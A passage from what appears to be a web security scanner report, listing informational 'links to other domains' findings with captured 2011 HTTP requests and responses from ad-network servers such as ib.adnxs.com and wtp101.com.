BAaABAqgBA7ABALkBkJ0uALYV5D_BAZCdLgC2FeQ_yQFmZmZmZmbyP9kBAAAAAAAA8D_gAQA.&ccd=!NwWFKgi5jQkQ_uwnGL3IASAA&referrer=http://www.goal.com&media_subtypes=1 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+Uxk1GOGkI/$_.v=_!`4hTmV3oY`#EoW=LnXT`HX)Ny^rF?u'>@*e?CDQ!(G@]1BW0Q<EQU#3!ZR*?l7/tm%40RO-2NpM_ZlEy!<e/e+ztxA; uuid2=-1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: uuid2=-1; path=/; expires=Sun, 19-Sep-2021 23:59:23 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Sun, 02 Oct 2011 23:59:23 GMT
Content-Length: 627

<script language="javascript" src="http://www.inadcoads.com/script.ashx?pczid=269ccbc6-3ea2-4863-8eb1-67f59498f8ce&click_url=http://ib.adnxs.com/click?VA8_znuE3j81XrpJDALbPwAAAMDMzPQ_idS0i2nG4T9os-pztRXkP1FauSSUjOIucEeI8W8QIlnW-ohOAAAAAE1ECABlAQAAAgQAAAIAAAB-9gkAPWQAAAAAAABVU0QAVVNEACwB-gD8AdsEKA8DAQUCAQQAAAAA9SRHEAAAAAA./cnd=!NwWFKgi5jQkQ_uwnGL3IASAA/referrer=http%3A%2F%2Fwww.goal.com/clickenc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLuQ1CQQwFwPe5tNJvg9SS97K9AS3Qw54xZdAVXUAvRIjJZ8cG4Npzjb2oEHtTSs0LWddJNc4UuK9qJg6H-_P73nH8j5bbHDEE4pEWLROmlWch7wurhaJDssMJ0JvDGdunOlyAxws_JgE413MAAAA%3D%26dst%3D">
</script>

19.148. http://ib.adnxs.com/if

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /if

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /if?enc=VgQNJ3Vfzj_hehSuR-HKPwAAAMDMzPQ_gL81A54syz82VmKelbTOPwrjFbNuftsOcEeI8W8QIllB_IhOAAAAAE1ECABlAQAAAgQAAAIAAAB-9gkAPWQAAAAAAABVU0QAVVNEACwB-gD8AdsEjAgBAgUCAQQAAAAA4CIHNQAAAAA.&pubclick=http://bid.openx.net/click?cd%3DH4sIAAAAAAAAABXLsQ0CMQwF0H8coEi3Bq2lxE7iuKBgAXYgOKkZg60Yg2Uo0L3-bVgAXKTVpxsP4qSdsotSlyZklrVr9tEKBxzu799tw7qPXvpwYaboedJsNdIswygli9rY1GsJOAJ6DThh-T4CzsDrgz_96owTcwAAAA%3D%3D%26dst%3D&tt_code=goal.com&udj=uf%28%27a%27%2C+27755%2C+1317600321%29%3Buf%28%27c%27%2C+125959%2C+1317600321%29%3Buf%28%27r%27%2C+652926%2C+1317600321%29%3Bppv%2817492%2C+%271070588350346683146%27%2C+1317600321%2C+1317859521%2C+125959%2C+25661%2C+0%29%3Bppv%2817492%2C+%271070588350346683146%27%2C+1317600321%2C+1317859521%2C+125959%2C+25661%2C+0%29%3B&cnd=!1h8O6giH2AcQ_uwnGAAgvcgBMAE4_ANAAEiCCFAAWABgeGgAcAJ4DIABAogBDJABAZgBAaABAqgBA7ABALkBDD4-AZa0zj_BAQw-PgGWtM4_yQHNzMzMzMz0P9kBAAAAAAAA8D_gAQA.&ccd=!TgVpKwiH2AcQ_uwnGL3IASAA&referrer=http://www.goal.com&media_subtypes=1 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+Uxk1GOGkI/$_.v=_!`4hTmV3oY`#EoW=LnXT`HX)Ny^rF?u'>@*e?CDQ!(G@]1BW0Q<EQU#3!ZR*?l7/tm%40RO-2NpM_ZlEy!<e/e+ztxA; uuid2=-1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OUR SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: uuid2=-1; path=/; expires=Mon, 20-Sep-2021 00:05:22 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Mon, 03 Oct 2011 00:05:22 GMT
Content-Length: 633

<script language="javascript" src="http://www.inadcoads.com/script.ashx?pczid=269ccbc6-3ea2-4863-8eb1-67f59498f8ce&click_url=http://ib.adnxs.com/click?VgQNJ3Vfzj_hehSuR-HKPwAAAMDMzPQ_gL81A54syz82VmKelbTOPwrjFbNuftsOcEeI8W8QIllB_IhOAAAAAE1ECABlAQAAAgQAAAIAAAB-9gkAPWQAAAAAAABVU0QAVVNEACwB-gD8AdsEjAgDAQUCAQQAAAAA4SIaNQAAAAA./cnd=!TgVpKwiH2AcQ_uwnGL3IASAA/referrer=http%3A%2F%2Fwww.goal.com/clickenc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLsQ0CMQwF0H8coEi3Bq2lxE7iuKBgAXYgOKkZg60Yg2Uo0L3-bVgAXKTVpxsP4qSdsotSlyZklrVr9tEKBxzu799tw7qPXvpwYaboedJsNdIswygli9rY1GsJOAJ6DThh-T4CzsDrgz_96owTcwAAAA%3D%3D%26dst%3D">
</script>

19.149. http://ib.adnxs.com/seg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /seg

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /seg?add=155746&redir=&t=1 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0666653885873574&output=html&h=250&slotname=7372794801&w=300&ea=0&flash=10.3.183&url=http%3A%2F%2Fads.pubmatic.com%2Fhosteddefaulttags%2F26620%2F26621%2F21556%2F559%2Fadtag.html&dt=1317606797018&bpp=7&shv=r20110921&jsv=r20110914&correlator=1317606797027&frm=8&adk=4114293891&ga_vid=1069027809.1317606797&ga_sid=1317606797&ga_hid=1887245699&ga_fc=0&u_tz=-300&u_his=8&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=23&u_nmime=106&dff=times%20new%20roman&dfs=16&adx=0&ady=0&biw=-12245933&bih=-12245933&ifk=2019610879&loc=http%3A%2F%2Fads.pubmatic.com%2FHostedDefaultTags%2F26620%2F26621%2F21556%2F559%2Fadtag.html&prodhost=googleads.g.doubleclick.net&fu=0&ifi=1&dtd=12
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+Uxk1GOGkI/$_.v=_!`4hTmV3oY`#EoW=LnXT`HX)Ny^rF?u'>@*e?CDQ!(G@]1BW0Q<EQU#3!ZR*?l7/tm%40RO-2NpM_ZlEy!<e/e+ztxA; uuid2=-1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: uuid2=-1; path=/; expires=Mon, 20-Sep-2021 01:53:21 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 03 Oct 2011 01:53:21 GMT
Content-Length: 360

document.write('<img src="http://ad.doubleclick.net/activity;src=2055485;dcnet=4845;boom=52987;sz=1x1;ord=1?" width="1" height="1"/>');document.write('<img src="http://b.scorecardresearch.com/b?c1=8&c2=6035145&c3=4845000000000000003&c4=&c5=&c6=&c15=&cv=1.3&cj=1" width="1" height="1"/>');document.write('<scr'+'ipt type="text/javascript" src="">
...[SNIP]...

19.150. http://ib.adnxs.com/ttj

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ttj

Issue detail

The page was loaded from a URL containing a query string. The response contains the following link to another domain:

Request

GET /ttj?id=449861&size=300x250&pfm=1&tlfs=ch&tmen=ch&tphv=ch&rtg=ga&brw=cr3&os=wn7&prm=0&efo=0&position=above&uatRandNo=65268&ad_type=ad&section=1782250&ad_size=300x250&cb=1918079288 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6391&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+Uxk1GOGkI/$_.v=_!`4hTmV3oY`#EoW=LnXT`HX)Ny^rF?u'>@*e?CDQ!(G@]1BW0Q<EQU#3!ZR*?l7/tm%40RO-2NpM_ZlEy!<e/e+ztxA; uuid2=-1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: uuid2=-1; path=/; expires=Sun, 19-Sep-2021 23:52:53 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Sun, 02 Oct 2011 23:52:53 GMT
Content-Length: 230

displayAds();document.write('<iframe src="http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"></iframe>
...[SNIP]...

19.151. http://int.teracent.net/tase/int

Summary

Severity:   Information
Confidence:   Certain
Host:   http://int.teracent.net
Path:   /tase/int

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /tase/int?adv=270&fmt=html&sec=0&pid=search&dest=1643195 HTTP/1.1
Host: int.teracent.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://fls.doubleclick.net/activityi;src=3057879;type=searc451;cat=searc443;u1=US;u12=109368;u13=324884;u14=255157;u15=1643195;u16=04%2F10%2F11-07%2F10%2F11;u18=2;ord=53963720?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=N9CZDAH.Q7IPoP; act=a$305#1315313311294_68374606_as3101_clk!1315313297486_68372787_as3103_imp!|; imp=a$le#1317384286603_272223897_ap3103_int|374#1316278116134_138322589_as3104_imp|308#1316265127233_137611811_as3107_imp|305#1315313297486_68372787_as3103_imp|; p161r=b$u-32#A.8Gx|g-yWB#1.8Gx|; p441r=b$u-21#5.8Pr|i-2870764#1.8Pr|

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: p270r=b$u-7#A.8Qp|i-1643195#2.8Qp|; Domain=.teracent.net; Expires=Sat, 31-Mar-2012 00:10:24 GMT; Path=/
Set-Cookie: imp=a$le#1317600624289_282559054_ap3100_int|374#1316278116134_138322589_as3104_imp|308#1316265127233_137611811_as3107_imp|305#1315313297486_68372787_as3103_imp|; Domain=.teracent.net; Expires=Sat, 31-Mar-2012 00:10:24 GMT; Path=/tase
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html;charset=UTF-8
Content-Length: 352
Date: Mon, 03 Oct 2011 00:10:23 GMT
Connection: close

<html><head></head><body>
<img src="http://bp.specificclick.net?pixid=99013083" width="1" height="1" /><img src="http://ads.bluelithium.com/pixel?id=1027970&t=2" width="1" height="1" /><img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=hotelsca_cs=1&betq=11310=420915" width = "1" height = "1" border = "0"></body>
...[SNIP]...

19.152. http://o-va1.wtp101.com/imp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://o-va1.wtp101.com
Path:   /imp

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /imp?bc=CgVvcGVueBIkMjg5MjMxMGQtNDYwYS00Y2UzLWJjMjYtNDNhMDhkZmQ1YTcxIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBH1GFLMK6OU.8QT8HNVps3f8P.gEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscfG0LluyTuhmTAJwT3iYRqhyPr7vh5Cg HTTP/1.1
Host: o-va1.wtp101.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s=!1762!3105!2445!1731; opvc=!3919,CgVvcGVueBIkMmQ3NDZmNTAtNmY5Yi00NmZiLWJlZmItNmM1YjNmYzNmYzAwIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBAAAAAAAAAAA8QQAAAAAAAAAAPgEAIAFAYIHB1dpbmRvd3M#,1317600201; pvmap=!3919,1317600201,ova3; tuuid=f9bdca69-e609-4297-9145-48ea56a0756c

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Mon, 03 Oct 2011 00:12:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: tuuid=f9bdca69-e609-4297-9145-48ea56a0756c; path=/; expires=Wed, 02 Oct 2013 00:12:58 GMT; domain=.wtp101.com
Set-Cookie: opvc=!3919,CgVvcGVueBIkMjg5MjMxMGQtNDYwYS00Y2UzLWJjMjYtNDNhMDhkZmQ1YTcxIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBH1GFLMK6OU.8QT8HNVps3f8P.gEAIAFAYIHB1dpbmRvd3M#,1317600778; path=/; expires=Wed, 02 Oct 2013 00:12:58 GMT; domain=.wtp101.com
Set-Cookie: pvmap=!3919,1317600778,ova!3919,1317600740,ova!3919,1317600698,ova!3919,1317600201,ova3; path=/; expires=Wed, 02 Oct 2013 00:12:58 GMT; domain=.wtp101.com
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Content-Length: 3709

<html><body><iframe SRC="http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va1.wtp101.com/click?bc=CgVvcGVueBIkMjg5MjMxMGQtNDYwYS00Y2UzLWJjMjYtNDNhMDhkZmQ1YTcxIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBH1GFLMK6OU.8QT8HNVps3f8P.gEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1089883246?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<script language='JavaScript1.1' SRC="http://fw.adsafeprotected.com/rjss/dc/10625/165712/adj/N5282.161249.ADNETIK.COM/B5256632.283;abr=!ie;sz=300x250;pc=[TPAS_ID];click0=http://o-va1.wtp101.com/click?bc=CgVvcGVueBIkMjg5MjMxMGQtNDYwYS00Y2UzLWJjMjYtNDNhMDhkZmQ1YTcxIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBH1GFLMK6OU.8QT8HNVps3f8P.gEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1089883246?">
</SCRIPT>
...[SNIP]...
TZhMDc1NmPgBADpBH1GFLMK6OU.8QT8HNVps3f8P.gEAIAFAYIHB1dpbmRvd3M%3D&redir=http://ad.doubleclick.net/jump/N5282.161249.ADNETIK.COM/B5256632.283;abr=!ie4;abr=!ie5;sz=300x250;pc=[TPAS_ID];ord=1089883246?">
<IMG SRC="http://fw.adsafeprotected.com/rfw/dc/10625/165710/ad/N5282.161249.ADNETIK.COM/B5256632.283;abr=!ie4;abr=!ie5;sz=300x250;pc=[TPAS_ID];ord=1089883246?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...
<noscript><img style="margin:0;padding:0;" border="0" width="1" height="1" src="http://l.betrad.com/ct/0_0_0_0_0_1220/pixel.gif?e=100&v=noscript"/></noscript>
...[SNIP]...

19.153. http://o-va1.wtp101.com/imp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://o-va1.wtp101.com
Path:   /imp

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /imp?bc=CgVvcGVueBIkNWI0YWUwODktMDVhYi00NWQ4LWJmMDMtZDcwNmM0YzJkZjM0IW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBHFzRlFVHvA.8QRYkXmDBvL-P.gEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscfv78GHyKVns_3jj9bHHoO7pP3Bj44Sw HTTP/1.1
Host: o-va1.wtp101.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s=!1762!3105!2445!1731; opvc=!3919,CgVvcGVueBIkMjg5MjMxMGQtNDYwYS00Y2UzLWJjMjYtNDNhMDhkZmQ1YTcxIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBH1GFLMK6OU.8QT8HNVps3f8P.gEAIAFAYIHB1dpbmRvd3M#,1317600698; pvmap=!3919,1317600698,ova!3919,1317600201,ova3; synclock=full; tuuid=f9bdca69-e609-4297-9145-48ea56a0756c

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Mon, 03 Oct 2011 00:13:31 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: tuuid=d22326de-7542-4e09-8630-c6943c0e5308; path=/; expires=Wed, 02 Oct 2013 00:13:31 GMT; domain=.wtp101.com
Set-Cookie: opvc=!3919,CgVvcGVueBIkNWI0YWUwODktMDVhYi00NWQ4LWJmMDMtZDcwNmM0YzJkZjM0IW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBHFzRlFVHvA.8QRYkXmDBvL-P.gEAIAFAYIHB1dpbmRvd3M#,1317600811; path=/; expires=Wed, 02 Oct 2013 00:13:31 GMT; domain=.wtp101.com
Set-Cookie: pvmap=!3919,1317600811,ova!3919,1317600797,ova!3919,1317600796,ova!3919,1317600795,ova!3919,1317600791,ova!3919,1317600784,ova!3919,1317600201,ova3d0469776442fe78d28ed2840; path=/; expires=Wed, 02 Oct 2013 00:13:31 GMT; domain=.wtp101.com
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
